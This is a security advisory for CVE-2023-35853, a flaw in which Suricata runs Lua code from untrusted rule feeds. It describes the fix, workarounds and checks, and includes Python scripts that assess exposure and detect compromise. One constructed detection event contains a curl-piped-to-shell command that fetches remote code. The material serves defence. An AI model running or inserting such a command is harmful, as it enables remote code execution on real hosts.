CVE-2023-35853

9.8 CRITICAL

📋 TL;DR

This vulnerability allows an adversary who controls an external source of Lua rules to execute arbitrary Lua code inside Suricata, with the same privileges as the Suricata process. It affects Suricata installations before version 6.0.13 that load Lua rules from sources they do not control; 6.0.13 adds the security.lua.allow-rules setting (off by default), so Lua rules are refused unless an operator explicitly permits them. The CVSS score of 9.8 indicates critical severity.

💻 Affected Systems

Products:
  • Suricata
Versions: All versions before 6.0.13
Operating Systems: All operating systems running Suricata
Default Config Vulnerable: ✅ No
Notes: Only exploitable if the Suricata binary was built with Lua support and the rule set comes from a source the operator does not fully control. Before 6.0.13 there is no configuration switch at all: Lua is a build-time option (--enable-lua / --enable-luajit, reported as "LUA support: yes" by suricata --build-info), and any such build loads and runs every Lua script a loaded rule references. Whether "the default configuration" is vulnerable therefore depends on how the package was built, not on suricata.yaml.

📦 What is this software?

Suricata is the open-source network IDS/IPS and network security monitoring engine maintained by the Open Information Security Foundation (OISF). It inspects traffic against signature rule sets and, when built with Lua support, can call Lua scripts referenced by rules via the lua/luajit rule keywords, which is the feature this CVE concerns.

⚠️ Risk & Real-World Impact

🔴 Worst Case

Full compromise of the sensor through code execution as the Suricata process, allowing the attacker to take control of the Suricata host, pivot to other systems, or silently blind network monitoring.

🟠 Likely Case

Execution of malicious Lua code within Suricata's context, leading to exfiltration of captured traffic and logs, tampering with alerts or IPS verdicts, or denial of service of the sensor.

🟢 If Mitigated

If Lua rules are disabled (security.lua.allow-rules off on 6.0.13+, or a build without Lua support), rules that reference Lua scripts are refused at load time and the script never runs. If only trusted, reviewed rule sources are used, the issue reduces to ordinary supply-chain risk for the rule feed.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation requires control over a Lua rule source. Suricata does not fetch rules itself, so the realistic paths are compromise of a rule feed or its mirror, a compromised rule-update pipeline (for example the host running suricata-update), or write access to the rules directory on the sensor.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 6.0.13

Vendor Fix Commit: https://github.com/OISF/suricata/commit/b95bbcc66db526ffcc880eb439dbe8abc87a81da

Restart Required: Yes

Instructions:

1. Upgrade Suricata to version 6.0.13 or later (the 7.0.0 and later releases also ship the security.lua.allow-rules setting).
2. Restart the Suricata service.
3. Leave security.lua.allow-rules at its default of false unless you need Lua rules. If you do enable it, do so only when every rule source is under your control and reviewed, because the setting is a single global switch with no per-source or per-path allowlist.

🔧 Temporary Workarounds

Disable Lua rules (all platforms)

Run a Suricata build without Lua support. Before 6.0.13 there is no suricata.yaml option that turns Lua rules off; Lua is a build-time feature (--enable-lua / --enable-luajit at configure time), so the only way to switch it off on a pre-fix version is a binary built without it. Check with suricata --build-info, which reports "LUA support: yes" or "no".

Restrict Lua rule sources (all platforms)

Only load rules from trusted, controlled sources, and review incoming rule files for the lua and luajit keywords before they reach the sensor. On 6.0.13 and later, keep security.lua.allow-rules at false (the default); note that it is a global boolean, so there is no way to allow Lua only for specific trusted paths.

🧯 If You Can't Patch

  • Deploy a Suricata build without Lua support, so rules referencing Lua scripts cannot load
  • Lock down the rule-update pipeline (suricata-update or equivalent) to trusted, pinned sources, and reject any incoming rule that uses the lua or luajit keyword
  • Restrict write access to the sensor's rules directory and egress from the sensor to the management network only, so a malicious script has nowhere to call home

🔍 How to Verify

Check if Vulnerable:

Run suricata --build-info, confirm the reported version is below 6.0.13, and check whether the build has Lua compiled in ("LUA support: yes"). A pre-6.0.13 build with Lua support is exposed whenever it loads rules from a source you do not control, because no configuration setting can refuse Lua rules on those versions.

Check Version:

suricata -V

(suricata --build-info prints the same "This is Suricata version X.Y.Z" line on its first line, plus the "LUA support:" line used above.)

Verify Fix Applied:

Verify the version is 6.0.13 or higher with suricata -V, then confirm that security.lua.allow-rules in suricata.yaml is either absent (the default is false) or explicitly false. If it is true, the upgrade alone has not closed the exposure; every rule source must then be trusted.
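The fix instructions, workarounds and verification steps above all come down to three checks: version, whether Lua is compiled in, and what security.lua.allow-rules says. The script below is an added example (not Suricata project code) that applies those checks to the text of suricata --build-info and to the security block of suricata.yaml, and also scans a rules file for rules that would pull in Lua scripts. All sample inputs are constructed; the minimal YAML lookup is deliberately not a full parser.

```python
"""Added example, not Suricata project code: assess exposure to CVE-2023-35853
from `suricata --build-info` output and the security.lua block of suricata.yaml,
and list rules that reference Lua scripts. All sample inputs are constructed."""
import re

FIXED_VERSION = (6, 0, 13)   # first 6.0.x release with security.lua.allow-rules

# Constructed excerpt of `suricata --build-info` for a pre-fix build with Lua.
SAMPLE_BUILD_INFO = """\
This is Suricata version 6.0.10 RELEASE
Features: PCAP_SET_BUFF AF_PACKET LIBCAP_NG HAVE_LUA HAVE_LUAJIT RUST
  LUA support:                             yes, through luajit
"""

# Constructed suricata.yaml excerpts: the safe default on fixed versions, and
# the weak setting an operator might flip on to keep old Lua rules working.
YAML_DEFAULT = """\
security:
  lua:
    # Allow Lua rules. Disabled by default.
    allow-rules: false
"""
YAML_WEAK = YAML_DEFAULT.replace("allow-rules: false", "allow-rules: true")

# Constructed rules file: a plain rule, a Lua rule, and a commented-out Lua rule.
SAMPLE_RULES = """\
alert tcp any any -> any any (msg:"plain rule"; content:"GET"; sid:1000001; rev:1;)
alert http any any -> any any (msg:"lua rule"; lua:check_uri.lua; sid:1000002; rev:1;)
# alert tcp any any -> any any (msg:"disabled"; luajit:old.lua; sid:1000003; rev:1;)
"""

# The lua/luajit rule keyword appears as an option, i.e. after '(' or ';'.
LUA_KEYWORD = re.compile(r"[(;]\s*lua(?:jit)?\s*:")


def parse_version(build_info):
    """Return (major, minor, patch) from the 'This is Suricata version X.Y.Z' line."""
    m = re.search(r"Suricata version (\d+)\.(\d+)\.(\d+)", build_info)
    if not m:
        raise ValueError("no version line in build-info output")
    return tuple(int(x) for x in m.groups())


def lua_compiled_in(build_info):
    """True when the build reports 'LUA support: yes...' (Lua is a build-time option)."""
    m = re.search(r"^\s*LUA support:\s*(\w+)", build_info, re.MULTILINE)
    return bool(m) and m.group(1).lower() == "yes"


def yaml_scalar(yaml_text, path):
    """Indentation-based lookup of one scalar such as security/lua/allow-rules.
    Enough for this small block; it is not a YAML parser."""
    stack = []                                  # (indent, key) of enclosing keys
    for raw in yaml_text.splitlines():
        line = raw.split("#", 1)[0].rstrip()    # drop comments
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip())
        key, _, value = line.strip().partition(":")
        while stack and stack[-1][0] >= indent:  # leave siblings/closed blocks
            stack.pop()
        stack.append((indent, key))
        if tuple(k for _, k in stack) == tuple(path):
            return value.strip().strip("'\"")
    return None


def lua_rules(rules_text):
    """Signature IDs of active (uncommented) rules that use the lua/luajit keyword."""
    sids = []
    for line in rules_text.splitlines():
        if line.lstrip().startswith("#") or not LUA_KEYWORD.search(line):
            continue
        m = re.search(r"\bsid\s*:\s*(\d+)", line)
        sids.append(int(m.group(1)) if m else None)
    return sids


def assess(build_info, yaml_text):
    """Classify exposure. Returns (exposed: bool, reason: str)."""
    version = parse_version(build_info)
    if not lua_compiled_in(build_info):
        return False, "built without Lua support; Lua rules cannot load"
    if version < FIXED_VERSION:
        return True, ("%d.%d.%d has Lua compiled in and no switch to refuse Lua "
                      "rules; any loaded Lua rule runs" % version)
    setting = (yaml_scalar(yaml_text, ("security", "lua", "allow-rules")) or "false").lower()
    if setting in ("true", "yes"):
        return True, "security.lua.allow-rules is enabled; Lua rules from every source run"
    return False, "security.lua.allow-rules is off (the default); Lua rules are refused"


if __name__ == "__main__":
    print(assess(SAMPLE_BUILD_INFO, YAML_DEFAULT))
    print(assess(SAMPLE_BUILD_INFO.replace("6.0.10", "6.0.13"), YAML_WEAK))
    print("active Lua rules:", lua_rules(SAMPLE_RULES))
```

On a real sensor, feed it `subprocess.run(["suricata", "--build-info"], capture_output=True, text=True).stdout`, the contents of /etc/suricata/suricata.yaml and of each file under the rules directory. The rule scan is the check that still matters after patching: a Lua rule turning up in a feed that never carried one is the supply-chain signal this CVE is about.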

📡 Detection & Monitoring

Log Indicators:

  • Lua rules (lua: or luajit: keywords) appearing in rule files fetched from an external feed that never carried them before
  • Processes spawned by the Suricata process: Suricata normally forks nothing after start-up, so a shell or utility whose parent is suricata is consistent with a Lua script calling os.execute()
  • On 6.0.13 and later with allow-rules off, a rule-load error mentioning lua in suricata.log means someone tried to push a Lua rule into your feed

Network Indicators:

  • Rule-update traffic (suricata-update or equivalent) to sources that are not your approved mirrors
  • Outbound connections from the Suricata process itself to destinations other than the management and rule-mirror networks

SIEM Query (ECS field names, Lucene syntax):

process.parent.name:suricata AND NOT process.name:suricata

process.name:suricata AND event.category:network AND NOT destination.ip:<allowlisted management/rule-mirror ranges>

Suricata takes no Lua-related command-line arguments, so filtering on process.args for "lua" finds nothing useful; the parent-child relationship and the destination allowlist are the signals that hold up.
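To show the two queries above as executable detection logic rather than search strings, here is an added example (not Suricata's code and not from any SIEM vendor) that runs them over constructed ECS-style process and network events. The field names (process.parent.name, destination.ip, event.category) follow ECS and the allowlisted range is an assumed value; adapt both to your own telemetry.

```python
"""Added example, not Suricata project code: apply the two detections from the
Detection section to constructed ECS-style events. Field names are assumed to
follow ECS; ALLOWED_DESTINATIONS is an assumed management/rule-mirror range."""
import ipaddress
import json

# Constructed sample events as JSON lines.
SAMPLE_EVENTS = "\n".join([
    # Normal service start: systemd launches suricata.
    json.dumps({"event": {"category": "process"}, "process": {"name": "suricata",
                "args": ["suricata", "-c", "/etc/suricata/suricata.yaml", "-i", "eth1"],
                "parent": {"name": "systemd"}}}),
    # Daemon-mode fork: suricata's parent is suricata itself; benign.
    json.dumps({"event": {"category": "process"}, "process": {"name": "suricata",
                "args": ["suricata", "-D"], "parent": {"name": "suricata"}}}),
    # A shell spawned by suricata: consistent with os.execute() from a Lua rule.
    json.dumps({"event": {"category": "process"}, "process": {"name": "sh",
                "args": ["sh", "-c", "curl http://203.0.113.5/x | sh"],
                "parent": {"name": "suricata"}}}),
    # Connection from suricata to the rule mirror inside the allowlist: ignored.
    json.dumps({"event": {"category": "network"}, "process": {"name": "suricata"},
                "destination": {"ip": "10.0.5.20", "port": 443}}),
    # Connection from suricata to an unknown host: flagged.
    json.dumps({"event": {"category": "network"}, "process": {"name": "suricata"},
                "destination": {"ip": "203.0.113.5", "port": 80}}),
])

# Assumed: where the sensor is allowed to talk (management net, rule mirror).
ALLOWED_DESTINATIONS = [ipaddress.ip_network("10.0.5.0/24")]


def _get(event, dotted, default=None):
    """Fetch a nested key by dotted path, e.g. 'process.parent.name'."""
    cur = event
    for part in dotted.split("."):
        if not isinstance(cur, dict) or part not in cur:
            return default
        cur = cur[part]
    return cur


def child_of_suricata(event):
    """process.parent.name:suricata AND NOT process.name:suricata"""
    return (_get(event, "event.category") == "process"
            and _get(event, "process.parent.name") == "suricata"
            and _get(event, "process.name") != "suricata")


def unexpected_destination(event):
    """process.name:suricata network event to an IP outside the allowlist."""
    if _get(event, "event.category") != "network" or _get(event, "process.name") != "suricata":
        return False
    try:
        ip = ipaddress.ip_address(_get(event, "destination.ip", ""))
    except ValueError:
        return True          # absent or malformed destination is itself worth a look
    return not any(ip in net for net in ALLOWED_DESTINATIONS)


def detect(jsonl):
    """Return (rule_name, detail) for every event that trips a detection."""
    alerts = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if child_of_suricata(ev):
            alerts.append(("suricata_spawned_process",
                           " ".join(_get(ev, "process.args", []))))
        if unexpected_destination(ev):
            alerts.append(("suricata_unexpected_destination",
                           "%s:%s" % (_get(ev, "destination.ip"), _get(ev, "destination.port"))))
    return alerts


if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(rule, "->", detail)
```

The daemon-mode case is why the first query excludes process.name:suricata: without that clause the sensor's own start-up fork would alert on every restart. Pipe real process-creation telemetry (auditd, eBPF or an EDR export in ECS form) into detect() to use it beyond the sample.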
